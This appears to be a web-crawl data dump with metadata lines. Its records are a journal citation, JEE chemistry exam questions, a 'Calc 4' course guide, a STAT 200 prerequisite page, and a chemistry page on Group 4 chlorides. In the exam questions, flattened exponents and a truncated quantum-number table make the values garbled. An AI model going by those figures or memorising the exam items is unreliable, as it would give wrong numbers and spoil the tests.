"The effect of early loss of anterior primary tooth on speech production in preschool children,"
Turkish Journal of Medical Sciences: Vol. 42:
5, Article 18.
Available at: https://journals.tubitak.gov.tr/medical/vol42/iss5/18 | <urn:uuid:6300da13-17d3-4f2a-9959-da9de9ffca90> | CC-MAIN-2023-14 | https://journals.tubitak.gov.tr/medical/vol42/iss5/18/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948858.7/warc/CC-MAIN-20230328104523-20230328134523-00216.warc.gz | en | 0.925098 | 435 | 2.65625 | 3 |
When the excited electron of a H atom from n = 5 drops to the ground state, the maximum number of emission lines observed are _____________.
If the work function of a metal is 6.63 $$\times$$ 10$$-$$19J, the maximum wavelength of the photon required to remove a photoelectron from the metal is ____________ nm. (Nearest integer)
[Given : h = 6.63 $$\times$$ 10$$-$$34 J s, and c = 3 $$\times$$ 108 m s$$-$$1]
Consider the following set of quantum numbers.
|A.||3||3||$$ - $$3|
|B.||3||2||$$ - $$2|
The number of correct sets of quantum numbers is __________.
If the uncertainty in velocity and position of a minute particle in space are, 2.4 $$\times$$ 10$$-$$26 (m s$$-$$1) and 10$$-$$7 (m) respectively. The mass of the particle in g is ____________. (Nearest integer)
(Given : h = 6.626 $$\times$$ 10$$-$$34 Js) | <urn:uuid:0171bd4d-f9f9-4980-b781-b985d962a2a7> | CC-MAIN-2023-14 | https://questions.examside.com/past-years/jee/question/pwhen-the-excited-electron-of-a-h-atom-from-n--5-drops-to-jee-main-chemistry-some-basic-concepts-of-chemistry-st9ifcnzfpdx3k88 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945381.91/warc/CC-MAIN-20230326013652-20230326043652-00616.warc.gz | en | 0.723699 | 289 | 2.9375 | 3 |
The course Calc 4 or Calculus 4 may differ in every institution that offers or teaches the course. It involves a wide range of branches or subfields of calculus necessary in the further understanding of the vast field of calculus. Calculus is a certain branch of mathematics that deals with continuous change. In this complete guide, we’ll discuss the different sides of calculus 4 and what to expect when you go through the course.
What Is Calc 4?
According to Thomas Edison State University, Calculus 4 is an intensive, higher-level course in mathematics that builds on Calculus 2 and Calculus 3 and focuses on the calculus of real-and-vector valued functions of one and several variables. The topics that will be discussed in this course are infinite sequences and series, convergence tests, power series, Taylor Series, and polynomials and their numerical approximations.
Type of Calculus
Most probably when you’re going to take up calculus 4, you already have taken up a series of calculus courses beforehand, and calc 4 is just a continuation of these other courses. It could also be taken alongside other calculus courses that is not a prerequisite of Calculus 4.
Since we already mentioned that Calculus 4 is not universal and definitely will vary depending on the university or school you are in, we list some of the possible calculus course that will be assigned to you when you enroll in Calc 4.
• Differential Calculus
• Integral Calculus
• Vector Calculus
• Multivariable Calculus
• Complex Calculus
Most of the time, Vector Calculus and Multivariable Calculus are considered the same or will belong in one course. Calculus 4 will fall under higher calculus since it is already the 4th calculus you will take. Thus, it is not possible for calc 4 to be Basic Calculus or other fundamental calculus subfields.
We will try to dissect each calculus subfield that may be your next Calculus 4.
Differential calculus focuses on investigation of the methods used in solving first- and second-order ordinary differential equations, systems of differential equations, Laplace transforms, and power series problems.
The course will highlight the following lessons:
- Fundamental techniques in solving first-order and higher-order differential equations that includes linear and non-linear
- Mathematical modelling
- Laplace Transforms generated as a tool in solving differential and integral equations
- Eigenvector analysis utilized in finding solutions to linear systems of differential equations
- Power series
Among the optional subjects are:
- Fourier Series
- Partial Differential Equations
Integral calculus is another component of calculus that is focused on the consequences, uses, and theories involving integrals. It is heavily concerned with area and volumes that can be graphed in a coordinate plane. The fundamental theorem of calculus, which demonstrates how a definite integral is determined by employing its antiderivative, connecting the two disciplines: differential and integral calculus.
Vector calculus is a certain branch of calculus that thrives on the differentiation and integration of vector fields, mainly applied on three-dimensional Euclidean space. Most of the time, vector calculus is used as a shorthand for the more general area of Multivariable Calculus. Moreover, vector calculus also deals with integrals particularly line integrals and surface integrals.
What is the Vector-Valued Function?
The vector-valued function is a function $r$ where the domain is the set of real numbers $t$ and the range is the set of vectors $r(t)$. The vector $r(t)$ is in the form:
where $f$, $g$, and $h$ are real-valued functions.
The vector-valued function defines curve in a 3D space by actually defining vectors from the origin that point to all the points on the curve for values of $t$.
Consider $r(t)=4 cos(t)i+3 sin(t)j$. This function can be written as:
r(t)=\langle4 cos(t),3 sin(t)\rangle.
Since $4 cos(t)$, and $3 sin(t)$ are defined in the set of real numbers, thus the domain for the function $r$ is the set of real numbers.Now, we know that the range of $cos(t)$ for all real numbers $t$ is $[-1,1]$, this follows that the range for $4 cos(t)$ is $[-4,4]$. For $sin(t)$, the range is $[-1,1]$, hence the range of $3 sin(t)$ is $[-3,3]$.
Therefore, the range of $r(t)$ is the set of vectors containing $\langle a,b\rangle$, where $a\in[-4,4]$, and $b\in[-3,3]$.
Some Calc 4 Textbooks You Can Use
We provide some of the textbooks that might help you with your studies in Calculus 4.
- CLP-4 Vector Calculus by Joel Feldman, Andrew Rechnitzer, and Elyse Yeager, 2017-21
- Introduction to Differential Calculus: Systematic Studies with Engineering Applications for Beginners by Ulrich L. Rhode, G. C. Jain, Ajay K. Poddar, and A. K. Gosh, 2011
- Vector Calculus by Paul C. Matthews, 1998
- Calculus by James Stewart, 2015
Take note that before choosing a calculus 4 textbook, check the course content and check whether the topics listed are covered in the textbook. This is to maximize the aid of your textbook in your studies.
Calculus, in its nature, is a very difficult course to take yet rewarding once completed. Thus, whether it is hard or not, it is still subjective and depends on the students’ effort and willingness to learn the course. It is important that you are well armored by your previous calculus courses before taking up Calc 4.
We have provided a brief but functional definition of possible Calculus 4 courses. Though the course is a varying subject to others, we can agree that Calculus 4 is an extensive exploration of numbers. Here are some of the important points tackled in this guide.
- Calculus 4 is a course proceeding previous calculus courses and may cover Differential calculus, Integral calculus, or Vector calculus.
- Differential calculus deals mainly on the dynamics and solutions of differential equations.
- Integral calculus focuses on integration techniques and its application on areas and volumes.
- Vector calculus is concerned with analysis, differentiation, and integration applied on vector fields.
We encourage you to explore these topics yourself — there’s an untapped world of mathematical discovery waiting for you! | <urn:uuid:336054aa-ff16-4c2f-94a7-6edd8937568d> | CC-MAIN-2023-14 | https://www.storyofmathematics.com/calc-4/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949694.55/warc/CC-MAIN-20230401001704-20230401031704-00616.warc.gz | en | 0.876541 | 1,558 | 3.09375 | 3 |
Knowledge of the following mathematical operations is required for STAT 200:
- Radicals (i.e., square roots)
- Summations \(\left( \sum \right) \)
- Factorials (!)
Additionally, the ability to perform these operations in the appropriate order is necessary. Use these materials to check your understanding and preparation for taking STAT 200.
We want our students to be successful! And we know that students that do not possess a working knowledge of these topics will struggle to participate successfully in STAT 200.
Are you ready? As a means of helping students assess whether or not what they currently know and can do to meet the expectations of instructors of STAT 200, the online program has put together a brief review of these concepts and methods. This is then followed by a short self-assessment exam that will help give you an idea if this prerequisite knowledge is readily available for you to apply.
1. Review the concepts and methods on the pages in this section of this website.
2. Download and complete the Self-Assessment Exam.
3. Review the Self-Assessment Exam Solutions and determine your score.
Your score on this self-assessment should be 100%! If your score is below this you should consider further review of these materials and are strongly encouraged to take MATH 021 or an equivalent course.
If you have struggled with the methods that are presented in the self assessment, you will indeed struggle in the courses that expect this foundation.
Note: These materials are NOT intended to be a complete treatment of the ideas and methods used in algebra. These materials and the self-assessment are simply intended as simply an 'early warning signal' for students. Also, please note that completing the self-assessment successfully does not automatically ensure success in any of the courses that use these foundation materials. Please keep in mind that this is a review only. It is not an exhaustive list of the material you need to have learned in your previous math classes. This review is meant only to be a simple guide of things you should remember and that are built upon in STAT 200. | <urn:uuid:5011b5c8-6510-4fc7-82c0-402c162ba93d> | CC-MAIN-2023-14 | https://online.stat.psu.edu/statprogram/reviews/algebra | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948817.15/warc/CC-MAIN-20230328073515-20230328103515-00017.warc.gz | en | 0.929939 | 463 | 2.90625 | 3 |
Chlorides of Group 4 Elements
- Page ID
This page briefly examines the tetrachlorides of carbon, silicon, and lead, as well as lead(II) chloride. It considers the compounds' structures, stability, and reactions with water.
Carbon, silicon and lead tetrachlorides
Each of these compounds has the formula XCl4. They are simple covalent molecules with a typical tetrahedral shape. They are liquids at room temperature (although at room temperature, lead(IV) chloride will tend to decompose to give lead(II) chloride and chlorine gas—see the discussion below).
Lead(II) chloride, PbCl2
Lead(II) chloride is a white solid, melting at 501°C. It is slightly soluble in cold water, but its solubility increases with temperature. Lead(II) chloride is essentially ionic in character.
At the top of Group 4, the most stable oxidation state is +4. This is the oxidation state of carbon and silicon in CCl4 and SiCl4. These compounds have no tendency to break down into dichlorides. However, the relative stability of the +4 oxidation state decreases down the group, and the +2 oxidation state becomes the most stable for lead and below. Lead(IV) chloride decomposes at room temperature to form the more stable lead(II) chloride and chlorine gas.
Reaction with water (hydrolysis)
Carbon tetrachloride (tetrachloromethane)
Carbon tetrachloride has no reaction with water. When added to water, it forms a separate layer underneath the layer of water. If a water molecule were to react with carbon tetrachloride, the oxygen atom in the water molecule would need to attach itself to the carbon atom via the oxygen's lone pair. A chlorine atom would be displaced the process. There are two problems with this idea.
First, chlorine atoms are so bulky and the carbon atom so small that the oxygen atom is sterically hindered from attacking the carbon atom.
Even if this were possible, there would be considerable cluttering around that carbon atom before the chlorine atom breaks away completely, causing a lot of repulsion between the various lone pairs on all the atoms surrounding the carbon, as shown below:
This repulsion makes the transition state very unstable. An unstable transition state indicates a high activation energy for the reaction.
The other problem is that there is no appropriate empty carbon orbital the oxygen lone pair can occupy.
If it attaches before the chlorine starts to break away, there would be an advantage. Forming a bond releases energy, and that energy would be readily available for breaking a carbon-chlorine bond. In the case of a carbon atom, however, this is impossible.
The situation is different with silicon tetrachloride. Silicon is larger, so there is more room for the water molecule to attack; the transition is less cluttered. Silicon has an additional advantage: there are empty 3d orbitals available to accept a lone pair from the water molecule. Carbon lacks this advantage because there are no empty 2-level orbitals available.
The oxygen atom can therefore bond to silicon before a silicon-chlorine bond breaks, makes the whole process easier energetically. In practice, silicon tetrachloride therefore reacts violently with water, forming white solid silicon dioxide and HCl gas.
\[SiCl_4 + 2H_2O \rightarrow SiO_2 + 4HCl\]
Liquid SiCl4 fumes in moist air for this reason—it reacts with water vapor in the air.
Lead tetrachloride (lead(IV) chloride)
The reaction of lead(IV) chloride with water is just like that of silicon tetrachloride. Lead(IV) oxide is produced as a brown solid, and fumes of hydrogen chloride given off (this can be confused with the decomposition of the lead(IV) chloride, which gives lead(II) chloride and chlorine gas as mentioned above).
\[ PbCl_4 + 2H_2O \rightarrow PbO_2 + 4HCl\]
Unlike the tetrachlorides, lead(II) chloride can be considered ionic in nature. It is slightly soluble in cold water, but more soluble in hot water. Water solubility involves disruption of the ionic lattice and hydration of the lead(II) and chloride ions to give Pb2+(aq) and Cl-(aq).
Contributors and Attributions
Jim Clark (Chemguide.co.uk)
Jim Clark (Chemguide.co.uk) | <urn:uuid:f1a0e768-efaf-4b3b-b55e-f3bbf9b0930d> | CC-MAIN-2023-14 | https://chem.libretexts.org/Bookshelves/Inorganic_Chemistry/Supplemental_Modules_and_Websites_(Inorganic_Chemistry)/Descriptive_Chemistry/Elements_Organized_by_Block/2_p-Block_Elements/Group_14%3A_The_Carbon_Family/1Group_14%3A_General_Chemistry/Chlorides_of_Group_4_Elements | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949598.87/warc/CC-MAIN-20230331082653-20230331112653-00617.warc.gz | en | 0.90367 | 996 | 4.03125 | 4 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.